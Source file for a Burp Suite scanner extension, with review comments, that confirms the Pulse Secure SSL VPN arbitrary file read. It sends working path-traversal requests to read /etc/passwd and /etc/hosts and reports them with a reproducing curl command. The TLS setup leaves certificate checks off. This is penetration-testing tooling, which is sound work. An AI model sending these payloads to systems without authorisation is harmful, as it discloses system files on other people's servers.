impulse101.py
from burp import IScannerCheck
from burp import IBurpExtender
from burp import IScanIssue
from java.io import PrintWriter
from array import array
from urlparse import urlparse
from os import path
from java.net import URL
import ssl
import socket
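class BurpExtender(IBurpExtender, IScannerCheck):
    """Burp scanner check for the Pulse SSL VPN arbitrary file read.

    When a response seen by the passive scanner contains one of the
    ``findkey`` markers, the check sends one confirmation request to the
    host on port 443 and raises a "High" issue if the reply contains the
    expected ``/etc/passwd`` marker.

    NOTE(review): the confirmation request is sent from ``doPassiveScan``,
    so this "passive" check generates traffic towards the target. The probe
    is therefore limited to URLs inside Burp's suite scope.
    """

    # Response substrings that trigger the confirmation request.
    findkey = ("/dana-na", "Pulse Secure")

    # Request targets used for confirmation (passwd) and for the extra
    # evidence attached to the issue (hosts).
    _PASSWD_PATH = "/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/"
    _HOSTS_PATH = "/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/hosts?/dana/html5acc/guacamole/"

    # Substring whose presence in the reply confirms the file read.
    _PASSWD_MARKER = "root:x:0:0:root"

    # Upper bound for connect/send/recv so a silent host cannot stall the
    # scanner thread indefinitely.
    _TIMEOUT_SECONDS = 10

    def registerExtenderCallbacks(self, callbacks):
        """Store the Burp callbacks, name the extension and register the check."""
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()
        callbacks.setExtensionName("Pulse SSL VPN Arbitrary File Read Scanner")
        dout = PrintWriter(callbacks.getStdout(), True)
        dout.println("Pulse SSL VPN Arbitrary File Read Scanner | by twitter.com/0x94")
        callbacks.registerScannerCheck(self)

    def _get_matches(self, response, match):
        """Return [start, end) offset pairs for every occurrence of *match*.

        The pairs are ``array('i', ...)`` values, the form passed to
        ``applyMarkers`` in ``doPassiveScan``.
        """
        matches = []
        start = 0
        reslen = len(response)
        matchlen = len(match)
        while start < reslen:
            start = self._helpers.indexOf(response, match, True, start, reslen)
            if start == -1:
                break
            matches.append(array('i', [start, start + matchlen]))
            start += matchlen
        return matches

    def _escape_html(self, data):
        """Escape HTML metacharacters in *data* before it enters issue detail."""
        return (data.replace("&", "&amp;")
                    .replace("<", "&lt;")
                    .replace(">", "&gt;")
                    .replace('"', "&quot;"))

    def _fetch(self, host, request_path):
        """Send one GET for *request_path* to *host*:443 and return the reply.

        Returns the first chunk received (at most 4096 bytes) or "" on any
        error. A reply that arrives split across several TLS records is
        therefore only partially read.
        """
        if not host:
            return ""
        conn = None
        try:
            # NOTE(review): Purpose.CLIENT_AUTH is the purpose meant for
            # server-side sockets; in CPython it leaves certificate and
            # hostname verification off, so the peer is not authenticated.
            # Confirm this is intended (and how Jython's ssl module behaves).
            ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
            conn = socket.create_connection((host, 443), timeout=self._TIMEOUT_SECONDS)
            conn = ctx.wrap_socket(conn, server_hostname=host)
            conn.send("GET " + request_path + " HTTP/1.1\r\nhost: " + host + "\r\n\r\n")
            return conn.recv(4096)
        except Exception:
            # Best effort: any failure is treated as "not confirmed".
            print("Connection Error! ")
            return ""
        finally:
            # The original never closed the socket; release it on every path.
            if conn is not None:
                try:
                    conn.close()
                except Exception:
                    pass

    def etc_getir(self, host):
        """Return the raw reply if it contains the passwd marker, else ""."""
        resp = self._fetch(host, self._PASSWD_PATH)
        if self._PASSWD_MARKER in resp:
            return resp
        return ""

    def host_getir(self, host):
        """Return the raw reply to the hosts-file request, or "" on error."""
        return self._fetch(host, self._HOSTS_PATH)

    def altaal(self, data):
        """Append ``<br>`` to every newline-separated segment of *data*."""
        return "".join(line + "<br>" for line in data.split("\n"))

    def doPassiveScan(self, baseRequestResponse):
        """Confirm and report the file read for responses that look like Pulse.

        Returns a one-element list with the issue, or None when the response
        has no marker, the URL is out of scope, or confirmation fails.
        """
        response = baseRequestResponse.getResponse()
        for keyim in self.findkey:
            matches = self._get_matches(response, keyim)
            if not matches:
                continue

            url = self._helpers.analyzeRequest(baseRequestResponse).getUrl()
            # The markers can appear in any page that merely mentions the
            # product; only send the confirmation request to in-scope targets.
            if not self._callbacks.isInScope(url):
                return None

            hostname = urlparse(str(url)).hostname
            passwd = self.etc_getir(hostname)
            if self._PASSWD_MARKER not in passwd:
                # One confirmation attempt per response is enough.
                return None

            hosts = self.host_getir(hostname)
            # Remote replies are untrusted and Burp renders issue detail as
            # HTML, so escape them before wrapping in markup.
            text = (
                "<p>" + self.altaal(self._escape_html(passwd)) + "</p>"
                "<p>" + self.altaal(self._escape_html(hosts)) + "</p>"
                " info : <p> curl --path-as-is -s -k \"https://"
                + self._escape_html(hostname) + self._PASSWD_PATH + "\" </p>"
            )
            return [CustomScanIssue(
                baseRequestResponse.getHttpService(),
                url,
                [self._callbacks.applyMarkers(baseRequestResponse, None, matches)],
                "Pulse SSL VPN Arbitrary File Read",
                text,
                "High")]
        return None

    def doActiveScan(self, baseRequestResponse, insertionPoint):
        """No active check is implemented; present because IScannerCheck declares it."""
        return None

    def consolidateDuplicateIssues(self, existingIssue, newIssue):
        """Keep the existing issue when a new one has the same name."""
        if existingIssue.getIssueName() == newIssue.getIssueName():
            return -1
        return 0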
class CustomScanIssue(IScanIssue):
    """Plain value object holding the fields Burp reads from a scan issue."""

    def __init__(self, httpService, url, httpMessages, name, detail, severity):
        """Store the issue fields exactly as supplied by the caller."""
        self._httpService, self._url = httpService, url
        self._httpMessages = httpMessages
        self._name, self._detail = name, detail
        self._severity = severity

    def getUrl(self):
        """Return the URL the issue was raised for."""
        return self._url

    def getIssueName(self):
        """Return the issue title."""
        return self._name

    def getIssueType(self):
        """Return the issue type identifier; always 0 here."""
        return 0

    def getSeverity(self):
        """Return the severity string given at construction."""
        return self._severity

    def getConfidence(self):
        """Return the confidence level; always "Certain"."""
        return "Certain"

    def getIssueBackground(self):
        """No background text is provided."""
        return None

    def getRemediationBackground(self):
        """No remediation background is provided."""
        return None

    def getIssueDetail(self):
        """Return the HTML detail text given at construction."""
        return self._detail

    def getRemediationDetail(self):
        """No remediation detail is provided."""
        return None

    def getHttpMessages(self):
        """Return the request/response items attached to the issue."""
        return self._httpMessages

    def getHttpService(self):
        """Return the HTTP service the issue belongs to."""
        return self._httpService